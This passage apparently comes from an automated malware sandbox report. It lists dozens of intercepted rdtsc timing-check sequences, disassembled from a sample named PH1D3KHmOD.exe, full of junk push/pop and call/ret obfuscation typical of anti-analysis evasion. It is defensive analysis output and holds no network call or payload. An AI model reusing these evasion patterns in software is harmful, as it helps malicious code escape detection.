      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E6EE7 second address: 2E6F61 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8CACB12CB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push edx 0x00000010 pop edx 0x00000011 popad 0x00000012 jmp 00007F8CACB12CC6h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F8CACB12CB8h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 push 00000000h 0x00000035 mov si, dx 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push esi 0x0000003d call 00007F8CACB12CB8h 0x00000042 pop esi 0x00000043 mov dword ptr [esp+04h], esi 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc esi 0x00000050 push esi 0x00000051 ret 0x00000052 pop esi 0x00000053 ret 0x00000054 push eax 0x00000055 pushad 0x00000056 push eax 0x00000057 push esi 0x00000058 pop esi 0x00000059 pop eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E6D46 second address: 2E6D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E6D4A second address: 2E6D50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E6D50 second address: 2E6D56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E6D56 second address: 2E6D5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E8EBE second address: 2E8EDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F8CACC719EDh 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jng 00007F8CACC719E6h 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E9F77 second address: 2E9F90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E9F90 second address: 2E9FF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007F8CACC719F2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D25FAh], edx 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F8CACC719E8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov edi, 4A7A3086h 0x00000039 push eax 0x0000003a push edi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F8CACC719F3h 0x00000042 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EAA67 second address: 2EAA6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EAA6E second address: 2EAAFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACC719F2h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F8CACC719E8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c movzx esi, bx 0x0000002f mov di, 8523h 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007F8CACC719E8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov edi, dword ptr [ebp+122D1DFBh] 0x00000055 jmp 00007F8CACC719F5h 0x0000005a push eax 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e jnc 00007F8CACC719E6h 0x00000064 pop eax 0x00000065 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EB5F7 second address: 2EB5FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EEC4D second address: 2EEC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EEC51 second address: 2EEC63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007F8CACB12CBAh 0x0000000c pop edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EEC63 second address: 2EEC83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jne 00007F8CACC719E6h 0x00000009 ja 00007F8CACC719E6h 0x0000000f pop edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8CACC719EEh 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2EEC83 second address: 2EEC87 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F147E second address: 2F1484 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F1484 second address: 2F1488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F42CD second address: 2F434F instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 js 00007F8CACC719E6h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 popad 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D287Dh] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F8CACC719E8h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+1247A441h] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push eax 0x0000003f call 00007F8CACC719E8h 0x00000044 pop eax 0x00000045 mov dword ptr [esp+04h], eax 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc eax 0x00000052 push eax 0x00000053 ret 0x00000054 pop eax 0x00000055 ret 0x00000056 jmp 00007F8CACC719ECh 0x0000005b xor bx, 5958h 0x00000060 xchg eax, esi 0x00000061 push eax 0x00000062 push edx 0x00000063 jnl 00007F8CACC719E8h 0x00000069 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F434F second address: 2F4378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8CACB12CBEh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F52A9 second address: 2F52B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F52B1 second address: 2F5301 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push ecx 0x0000000c call 00007F8CACB12CB8h 0x00000011 pop ecx 0x00000012 mov dword ptr [esp+04h], ecx 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc ecx 0x0000001f push ecx 0x00000020 ret 0x00000021 pop ecx 0x00000022 ret 0x00000023 adc edi, 4CD883A0h 0x00000029 jc 00007F8CACB12CBCh 0x0000002f mov edi, dword ptr [ebp+122D282Dh] 0x00000035 push 00000000h 0x00000037 mov edi, 1B680646h 0x0000003c push 00000000h 0x0000003e add bx, 2FE5h 0x00000043 push eax 0x00000044 pushad 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F5301 second address: 2F531B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F8CACC719F2h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F242B second address: 2F2431 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F2431 second address: 2F2435 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F5572 second address: 2F5583 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8CACB12CB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F661E second address: 2F6623 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F9284 second address: 2F928A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2F928A second address: 2F928E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FA1A3 second address: 2FA1A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FB3E5 second address: 2FB3EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FD102 second address: 2FD108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FD108 second address: 2FD10C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FF1DB second address: 2FF1DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FF1DF second address: 2FF1F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FF1F5 second address: 2FF200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FD325 second address: 2FD350 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F8CACC719ECh 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FF200 second address: 2FF206 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FD350 second address: 2FD356 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2FF206 second address: 2FF225 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8CACB12CC7h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3024DC second address: 302501 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F8CACC719F8h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pop ecx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 302501 second address: 302507 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 302507 second address: 30250B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 302731 second address: 302764 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACB12CC8h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F8CACB12CC0h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 303594 second address: 30359A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 30AC44 second address: 30AC63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8CACB12CBFh 0x0000000f jns 00007F8CACB12CB6h 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 30A69C second address: 30A6A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 30A6A1 second address: 30A6B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBAh 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a ja 00007F8CACB12CB6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 30D151 second address: 30D15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jc 00007F8CACC719E6h 0x0000000c popad 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 30D15E second address: 30D173 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F8CACB12CBBh 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 310682 second address: 310686 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3173D5 second address: 31740B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jg 00007F8CACB12CC2h 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 jmp 00007F8CACB12CC0h 0x00000018 popad 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 31740B second address: 31742C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F8CACC719EEh 0x0000000b jng 00007F8CACC719F2h 0x00000011 jne 00007F8CACC719E6h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316671 second address: 316675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316675 second address: 316692 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8CACC719F7h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316692 second address: 316696 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316696 second address: 31669A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 31669A second address: 3166A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3166A0 second address: 3166AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3166AE second address: 3166B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3166B4 second address: 3166BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ecx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3166BE second address: 3166D5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8CACB12CBCh 0x00000008 jnl 00007F8CACB12CB6h 0x0000000e push ecx 0x0000000f jo 00007F8CACB12CB6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316999 second address: 3169A3 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8CACC719E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3169A3 second address: 3169CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8CACB12CBDh 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3169CD second address: 3169FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACC719EFh 0x00000008 push eax 0x00000009 pop eax 0x0000000a jne 00007F8CACC719E6h 0x00000010 jmp 00007F8CACC719EFh 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 3169FB second address: 316A01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316A01 second address: 316A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316CB6 second address: 316CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316F8D second address: 316F91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316F91 second address: 316F97 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316F97 second address: 316F9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316F9D second address: 316FA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F8CACB12CB6h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316FA7 second address: 316FC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACC719F1h 0x00000007 jo 00007F8CACC719E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 316FC6 second address: 316FCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 31725F second address: 317263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 317263 second address: 317269 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 31BD6A second address: 31BD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 31BD6F second address: 31BD77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E38BE second address: 2E38DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8CACC719EAh 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e jc 00007F8CACC719F4h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E38DB second address: 2E38DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E3C84 second address: 2E3C88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E3D64 second address: 2E3D7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8CACB12CBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E3D7D second address: 2E3D83 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E3D83 second address: 2E3D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E3D89 second address: 2E3D8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\PH1D3KHmOD.exeRDTSC instruction interceptor: First address: 2E3E50 second address: 2E3E54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
